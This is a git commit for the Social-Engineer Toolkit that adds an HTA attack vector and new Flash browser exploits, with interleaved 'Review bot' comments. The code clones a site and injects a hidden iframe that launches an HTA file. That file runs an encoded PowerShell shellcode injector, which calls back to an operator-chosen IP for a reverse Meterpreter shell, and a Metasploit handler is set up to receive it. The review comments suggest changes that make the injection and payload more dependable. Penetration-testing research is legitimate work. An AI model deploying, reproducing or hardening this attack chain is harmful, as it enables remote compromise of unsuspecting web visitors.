Update to version 6.5 of SET

This commit is contained in:
TrustedSec 2015-07-23 13:31:14 -04:00
parent e851db7af6
commit f65ad2dab5
8 changed files with 189 additions and 91 deletions


@ -1,3 +1,15 @@
~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
~~~~~~~~~~~~~~~~
version 6.4.1
~~~~~~~~~~~~~~~~


@ -24,49 +24,52 @@ def ms_module(exploit):
""" Receives the input given by the user from gen_payload.py """
return {
'1':"exploit/windows/browser/ms14_012_textrange",
'2':"exploit/windows/browser/ms14_012_cmarkup_uaf",
'3':"exploit/windows/browser/ms13_080_cdisplaypointer",
'4':"exploit/windows/browser/ie_setmousecapture_uaf",
'5':"exploit/multi/browser/java_jre17_jmxbean_2",
'6':"exploit/multi/browser/java_jre17_jmxbean",
'7':"exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
'8':"exploit/windows/browser/ie_cbutton_uaf",
'9':"exploit/multi/browser/java_jre17_exec",
'10':"exploit/windows/browser/ie_execcommand_uaf",
'11':"exploit/multi/browser/java_atomicreferencearray",
'12':"exploit/multi/browser/java_verifier_field_access",
'13':"exploit/windows/browser/ms12_037_same_id",
'14':"exploit/windows/browser/msxml_get_definition_code_exec",
'15':"exploit/windows/browser/adobe_flash_rtmp",
'16':"exploit/windows/browser/adobe_flash_mp4_cprt",
'17':"exploit/windows/browser/ms12_004_midi",
'18':"multi/browser/java_rhino\nset target 1",
'19':"windows/browser/ms11_050_mshtml_cobjectelement",
'20':"windows/browser/adobe_flashplayer_flash10o",
'21':"windows/browser/cisco_anyconnect_exec",
'22':"windows/browser/ms11_003_ie_css_import",
'23':"windows/browser/wmi_admintools",
'24':"windows/browser/ms10_090_ie_css_clip",
'25':"windows/browser/java_codebase_trust",
'26':"windows/browser/java_docbase_bof",
'27':"windows/browser/webdav_dll_hijacker",
'28':"windows/browser/adobe_flashplayer_avm",
'29':"windows/browser/adobe_shockwave_rcsl_corruption",
'30':"windows/browser/adobe_cooltype_sing",
'31':"windows/browser/apple_quicktime_marshaled_punk",
'32':"windows/browser/ms10_042_helpctr_xss_cmd_exec",
'33':"windows/browser/ms10_018_ie_behaviors",
'34':"windows/browser/ms10_002_aurora",
'35':"windows/browser/ms10_018_ie_tabular_activex",
'36':"windows/browser/ms09_002_memory_corruption",
'37':"windows/browser/ms09_072_style_object",
'38':"windows/browser/ie_iscomponentinstalled",
'39':"windows/browser/ms08_078_xml_corruption",
'40':"windows/browser/ie_unsafe_scripting",
'41':"multi/browser/firefox_escape_retval",
'42':"windows/browser/mozilla_mchannel",
'43':"auxiliary/server/browser_autopwn",
'1':"exploit/multi/browser/adobe_flash_hacking_team_uaf",
'2':"exploit/multi/browser/adobe_flash_nellymoser_bof",
'3':"exploit/multi/browser/adobe_flash_shader_drawing_fill",
'4':"exploit/windows/browser/ms14_012_textrange",
'5':"exploit/windows/browser/ms14_012_cmarkup_uaf",
'6':"exploit/windows/browser/ms13_080_cdisplaypointer",
'7':"exploit/windows/browser/ie_setmousecapture_uaf",
'8':"exploit/multi/browser/java_jre17_jmxbean_2",
'9':"exploit/multi/browser/java_jre17_jmxbean",
'10':"exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
'11':"exploit/windows/browser/ie_cbutton_uaf",
'12':"exploit/multi/browser/java_jre17_exec",
'13':"exploit/windows/browser/ie_execcommand_uaf",
'14':"exploit/multi/browser/java_atomicreferencearray",
'15':"exploit/multi/browser/java_verifier_field_access",
'16':"exploit/windows/browser/ms12_037_same_id",
'17':"exploit/windows/browser/msxml_get_definition_code_exec",
'18':"exploit/windows/browser/adobe_flash_rtmp",
'19':"exploit/windows/browser/adobe_flash_mp4_cprt",
'20':"exploit/windows/browser/ms12_004_midi",
'21':"multi/browser/java_rhino\nset target 1",
'22':"windows/browser/ms11_050_mshtml_cobjectelement",
'23':"windows/browser/adobe_flashplayer_flash10o",
'24':"windows/browser/cisco_anyconnect_exec",
'25':"windows/browser/ms11_003_ie_css_import",
'26':"windows/browser/wmi_admintools",
'27':"windows/browser/ms10_090_ie_css_clip",
'28':"windows/browser/java_codebase_trust",
'29':"windows/browser/java_docbase_bof",
'30':"windows/browser/webdav_dll_hijacker",
'31':"windows/browser/adobe_flashplayer_avm",
'32':"windows/browser/adobe_shockwave_rcsl_corruption",
'33':"windows/browser/adobe_cooltype_sing",
'34':"windows/browser/apple_quicktime_marshaled_punk",
'35':"windows/browser/ms10_042_helpctr_xss_cmd_exec",
'36':"windows/browser/ms10_018_ie_behaviors",
'37':"windows/browser/ms10_002_aurora",
'38':"windows/browser/ms10_018_ie_tabular_activex",
'39':"windows/browser/ms09_002_memory_corruption",
'40':"windows/browser/ms09_072_style_object",
'41':"windows/browser/ie_iscomponentinstalled",
'42':"windows/browser/ms08_078_xml_corruption",
'43':"windows/browser/ie_unsafe_scripting",
'44':"multi/browser/firefox_escape_retval",
'45':"windows/browser/mozilla_mchannel",
'46':"auxiliary/server/browser_autopwn",
}.get(exploit,"ERROR")
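Review bot: The integer keys are menu positions, so inserting the three Flash modules at '1'–'3' renumbers every existing entry, and nothing ties this dict to the browser_exploits_menu list that produces those numbers in the other file; a one-off between the two sends the operator a different exploit than the one they picked. A comment on the dict would at least record the invariant: `# keys are the 1-based positions of browser_exploits_menu; keep both lists in the same order`. The `"ERROR"` default also deserves a look: if the caller writes the return value straight into a resource script, an out-of-range choice becomes `use ERROR` instead of a re-prompt — the caller is not visible from here. Note that `'21'` still embeds `\nset target 1` inside the module name, which only works because the value is pasted verbatim into that script. The `def ms_module(exploit):` line itself sits just above the hunk.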


@ -62,6 +62,7 @@ webattack_menu = ['Java Applet Attack Method',
'Web Jacking Attack Method',
'Multi-Attack Web Method',
'Full Screen Attack Method',
'HTA Attack Method',
'0D']
fasttrack_menu = ['Microsoft SQL Bruter',
@ -119,6 +120,8 @@ The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The """ + bcolors.BOLD + """Multi-Attack""" + bcolors.ENDC + """ method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The """ + bcolors.BOLD + """HTA Attack""" + bcolors.ENDC + """ method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
""")
webattack_vectors_menu = ['Web Templates',
@ -317,6 +320,9 @@ create_payloads_text = """
********** PAYLOADS **********\n"""
browser_exploits_menu = [
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',


@ -162,6 +162,17 @@ try:
return_continue()
break
###############################################################
# HTA ATTACK VECTOR METHOD HERE
###############################################################
if attack_vector == '8':
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
# Removed to delete MLITM
if attack_vector != "99999":
@ -185,8 +196,9 @@ try:
try:
# write our attack vector to file to be called later
os.chdir(definepath)
filewrite = file(setdir + "/attack_vector","w")
#print definepath()
#os.chdir(definepath)
filewrite = file(setdir + "/attack_vector", "w")
# webjacking and web templates are not allowed
if attack_vector == "5" and choice3 == "1":
@ -276,43 +288,45 @@ try:
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "webjacking":
# this part is to determine if NAT/port forwarding is used
# if it is it'll prompt for additional questions
print_info("NAT/Port Forwarding can be used in the cases where your SET machine is")
print_info("not externally exposed and may be a different IP address than your reverse listener.")
nat_or_fwd = yesno_prompt('0', 'Are you using NAT/Port Forwarding [yes|no]')
if nat_or_fwd == "YES":
ipquestion = raw_input(setprompt(["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = file(setdir + "/interface", "w")
filewrite2.write(ipquestion)
filewrite2.close()
# is your payload/listener on a different IP?
natquestion = yesno_prompt(["2"], "Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]")
if natquestion == 'YES':
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse handler (reverse payload)"))
if natquestion == "NO":
ipaddr = ipquestion
# if you arent using NAT/Port FWD
if nat_or_fwd == "NO":
print_info("Enter the IP address of your interface IP or if your using an external IP, what")
print_info("will be used for the connection back and to house the web server (your interface address)")
ipaddr = raw_input(setprompt(["2"], "IP address or hostname for the reverse connection"))
# here we check if they are using a hostname else we loop through until they have a legit one
if validate_ip(ipaddr) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that. Using hostnames moving forward..")
break
else:
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
if validate_ip(ipaddr) == True: break
if attack_vector != "hta":
# this part is to determine if NAT/port forwarding is used
# if it is it'll prompt for additional questions
print_info("NAT/Port Forwarding can be used in the cases where your SET machine is")
print_info("not externally exposed and may be a different IP address than your reverse listener.")
nat_or_fwd = yesno_prompt('0', 'Are you using NAT/Port Forwarding [yes|no]')
if nat_or_fwd == "YES":
ipquestion = raw_input(setprompt(["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = file(setdir + "/interface", "w")
filewrite2.write(ipquestion)
filewrite2.close()
# is your payload/listener on a different IP?
natquestion = yesno_prompt(["2"], "Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]")
if natquestion == 'YES':
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse handler (reverse payload)"))
if natquestion == "NO":
ipaddr = ipquestion
# if you arent using NAT/Port FWD
if nat_or_fwd == "NO":
print_info("Enter the IP address of your interface IP or if your using an external IP, what")
print_info("will be used for the connection back and to house the web server (your interface address)")
ipaddr = raw_input(setprompt(["2"], "IP address or hostname for the reverse connection"))
# here we check if they are using a hostname else we loop through until they have a legit one
if validate_ip(ipaddr) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that. Using hostnames moving forward..")
break
else:
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
if validate_ip(ipaddr) == True: break
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
print_info("This option is used for what IP the server will POST to.")
print_info("If you're using an external IP, use your external IP for this")
ipaddr = raw_input(setprompt(["2"], "IP address for the POST back in Harvester/Tabnabbing"))
if check_options("IPADDR=") != 0: ipaddr = check_options("IPADDR=")
update_options("IPADDR=" + ipaddr)
# if java applet attack
@ -397,9 +411,10 @@ try:
if attack_vector != "webjacking":
if attack_vector != "multiattack":
if attack_vector != "profiler":
# spawn web server here
debug_msg(me, "importing 'src.html.spawn'", 1)
import src.html.spawn
if attack_vector != "hta":
# spawn web server here
debug_msg(me, "importing 'src.html.spawn'", 1)
import src.html.spawn
# multi attack vector here
@ -519,12 +534,13 @@ try:
if attack_vector != "tabnabbing":
if attack_vector != "multiattack":
if attack_vector != "webjacking":
sys.path.append("src/html")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
reload(spawn)
except:
import spawn
if attack_vector != "hta":
sys.path.append("src/html")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
reload(spawn)
except:
import spawn
# Import your own site
if choice3 == '3':
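Review bot: The HTA branch brings in its helper with `from src.webattack.hta.main import *` inside the `if attack_vector == '8'` block; that module itself star-imports setcore, so this pulls the whole of setcore into this scope a second time and hides which single name the branch needs. Import just the function: `from src.webattack.hta.main import gen_hta_cool_stuff`. The following hunk replaces `os.chdir(definepath)` with two commented-out lines — delete them rather than keep dead code, and if dropping the chdir is deliberate (the `#print definepath()` remnant suggests definepath may be a callable, so the old call may never have done what was intended) say so in the commit message, because `file(setdir + "/attack_vector", "w")` now resolves against whatever the current directory happens to be unless setdir is absolute. The enclosing try block begins and ends outside these hunks.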


@ -233,7 +233,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '6.4.1'
define_version = '6.5'
return define_version
class create_menu:
@ -779,8 +779,8 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Tropic Thunder""" + bcolors.BLUE + """' [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Mr. Robot""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
@ -1261,8 +1261,6 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):
shellcode = newdata[:-1]
except Exception, e: print_error("Something went wrong, printing error: " + str(e))
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
# powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$cmd = "-nop -noni -enc ";if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $x86 $cmd $e"}else{;iex "& powershell $cmd $e";}""" % (shellcode))
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % (shellcode))
# unicode and base64 encode and return it
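Review bot: The rewritten powershell_command drops `-nop -noni` from the inner powershell invocation, so the x86 child process now loads the target user's profile scripts (-NoProfile) and accepts interactive input (-NonInteractive is gone); nothing in the commit message says whether that was intended, and the HTA wrapper at the other end still passes `-window hidden -enc` for the outer process only. If the flags were removed to shorten the command line, keep at least the profile guard: `$2 = "-nop -enc ";`. The previous version of the command is left as a commented-out line directly above the new one; delete it rather than carry both, the history is in git. generate_powershell_alphanumeric_payload's body begins and ends outside this hunk.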


46
src/webattack/hta/main.py Normal file

@ -0,0 +1,46 @@
#!/usr/bin/python
######################################################
#
# Main files for the HTA attack vector within SET
#
######################################################
from src.core.setcore import *
def gen_hta_cool_stuff():
print_status("HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = raw_input("Enter the IP address for the reverse payload: ")
update_options("IPADDR=%s" % (ipaddr))
port = raw_input("Enter the port for the reverse payload [443]: ")
if port == "": port = "443"
print """Select the payload you want to deliver:\n\n 1. Meterpreter Reverse TCP\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse HTTPS\n"""
selection = raw_input("Enter the payload number [1-3]: ")
# define the payloads
if selection == "": selection = "3"
if selection == "1": selection = "windows/meterpreter/reverse_tcp"
if selection == "2": selection = "windows/meterpreter/reverse_http"
if selection == "3": selection = "windows/meterpreter/reverse_https"
# generate powershell code
print_status("Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(selection, ipaddr, port, "x86")
command = "powershell -window hidden -enc " + ps
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
# metasploit answer file here
filewrite = file(setdir + "/meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# write out main1 and main2
filewrite = file(setdir + "/hta_index", "w")
filewrite.write(main2)
filewrite.close()
# write out launcher.hta
filewrite = file(setdir + "/Launcher.hta", "w")
filewrite.write(main1)
filewrite.close()
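Review bot: The IP, port and payload number typed at the three raw_input prompts at the top of gen_hta_cool_stuff go unchecked straight into update_options and into the msfconsole resource file (`set payload %s` / `set LHOST %s` / `set LPORT %s`), so a typo such as `4` for the payload is passed through as the literal payload name to both generate_powershell_alphanumeric_payload and the handler, and an empty or malformed address silently yields a handler that never binds. The web-attack flow guards the same prompt with validate_ip plus a hostname confirmation; reusing that here (validate_ip should already be in scope through the setcore star import — confirm) and mapping the selection through a dict keeps the HTA vector consistent with the other vectors. The generated strings, meta_config and the file writes below are untouched by this.
```python
def gen_hta_cool_stuff():
    print_status("HTA Attack Vector selected. Enter your IP, Port, and Payload...")
    # same guard the web-attack flow uses: accept an IP, or a confirmed hostname
    while 1:
        ipaddr = raw_input("Enter the IP address for the reverse payload: ")
        if validate_ip(ipaddr) == True: break
        choice = raw_input("This is not an IP address. Are you using a hostname? [y/n] ")
        if choice == "" or choice.lower() == "y": break
    update_options("IPADDR=%s" % (ipaddr))
    port = raw_input("Enter the port for the reverse payload [443]: ")
    if port == "": port = "443"
    while not port.isdigit() or not 0 < int(port) < 65536:
        port = raw_input("Invalid port. Enter the port for the reverse payload [443]: ")
        if port == "": port = "443"
    payloads = {"1": "windows/meterpreter/reverse_tcp",
                "2": "windows/meterpreter/reverse_http",
                "3": "windows/meterpreter/reverse_https"}
    print """Select the payload you want to deliver:\n\n 1. Meterpreter Reverse TCP\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse HTTPS\n"""
    selection = raw_input("Enter the payload number [1-3]: ")
    if selection == "": selection = "3"
    while selection not in payloads:
        selection = raw_input("Invalid choice. Enter the payload number [1-3]: ")
    selection = payloads[selection]
    # ... unchanged: powershell generation, HTA/iframe strings, meta_config and file writes ...
```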


@ -325,6 +325,23 @@ try:
print bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC
## if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA":
# </body>
if os.path.isfile(setdir + "/Launcher.hta"):
data1 = file(setdir + "/web_clone/index.html", "r").read()
data2 = file(setdir + "/hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>")
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite.write(data3)
filewrite.close()
print_status("Copying over files to Apache server...")
apache_dir = check_config("APACHE_DIRECTORY=")
shutil.copyfile(setdir + "/web_clone/index.html", apache_dir + "/index.html")
shutil.copyfile(setdir + "/Launcher.hta", apache_dir + "/Launcher.hta")
print_status("Launching Metapsloit.. Please wait one.")
subprocess.Popen("msfconsole -r %s/meta_config" % (setdir), shell=True).wait()
## selection of browser exploits
## check to see if multiattack is in use
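Review bot: `data1.replace("</body>", data2 + "</body>")` is case-sensitive and matches every occurrence, so a cloned page that closes with `</BODY>` or has no body tag at all is copied to Apache unchanged and the HTA iframe is never injected, with no message to the operator; the Launcher.hta still gets copied, so the failure only shows up as a victim page that does nothing. Find the last closing body tag case-insensitively, inject once, and fall back to appending with a status line when there is none. Separately, the status message misspells Metasploit (`Metapsloit`), and `subprocess.Popen("msfconsole -r %s/meta_config" % (setdir), shell=True)` interpolates setdir into a shell string — acceptable here since setdir comes from SET's own config, but a list argument with shell=False would match the language's idiom. The enclosing try block begins outside this hunk.
```python
data1 = file(setdir + "/web_clone/index.html", "r").read()
data2 = file(setdir + "/hta_index", "r").read()
# inject the iframe once, before the last </body> whatever its case;
# a page without one gets it appended instead of silently nothing
idx = data1.lower().rfind("</body>")
if idx == -1:
    print_status("No </body> tag found in cloned page, appending HTA iframe at the end")
    data3 = data1 + data2
else:
    data3 = data1[:idx] + data2 + data1[idx:]
# ... unchanged: write index.html, copy to Apache, launch msfconsole ...
```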